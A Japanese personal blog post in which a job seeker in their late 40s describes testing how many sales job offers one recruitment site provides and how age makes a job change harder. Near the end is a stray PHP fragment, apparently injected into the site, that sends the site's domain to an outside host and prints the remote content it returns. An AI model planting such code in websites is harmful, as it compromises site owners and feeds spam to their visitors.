前へ
次へ

営業求人を転職先として探してみました

もうすでに自分の年齢は40代後半で、この年齢で営業求人の情報を探した時にどれくらいの情報を得ることができるか、検証してみました。営業の情報の数は、インターネットの求人情報サイトをチェックすることでとても多くの情報があることを知っています。これはかなり前に自分が転職する時に営業の仕事を見つけたことがありましたので知っていました。さて、インターネットの求人情報サイトに自分の年齢や営業をしたいとか、それ以外の条件をいくつか入力した上でインターネットの求人サイトの担当者からの連絡を待ってみることにしました。過去、自分が本当に転職をすることになり、今と同じような感じでインターネットの求人情報サイトを使って営業の仕事を探した時は、年齢が30代だったこともあってか、かなりスムーズに多くの営業の求人情報を紹介してもらいました。今回については、前回と同じような感じのスムーズさではありませんでした。実際には登録してから4日が経った時に初めて営業の求人の紹介がありました。やはり前回とは大きく違うと感じ、年齢で転職活動がどれくらい難しくなるのかを実感しました。もちろん、インターネットの求人情報サイトの担当者は手を抜いているわけではなく、真剣になって自分にぴったりとあった仕事があるかどうかを探してくれていました。しかし、結果的に40代の後半で営業として人を雇いたいという企業は少なくないようでした。今回は実際に転職活動をしようか迷っていた時ですから、年齢的に転職はかなり難しく、少ない営業の求人情報の中で、転職活動を進めていかないといけないことを知り、諦めました。ただ、この検証は一つのインターネットの求人情報サイトしか利用していません。過去に自分が転職を決めた時は複数のサイトに登録して、それぞれの担当者から情報をもらっていたので、一概には言えません。年齢的に不利な状況で転職活動をする人は、できるだけ多くのサイトに登録する方が良いでしょう。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top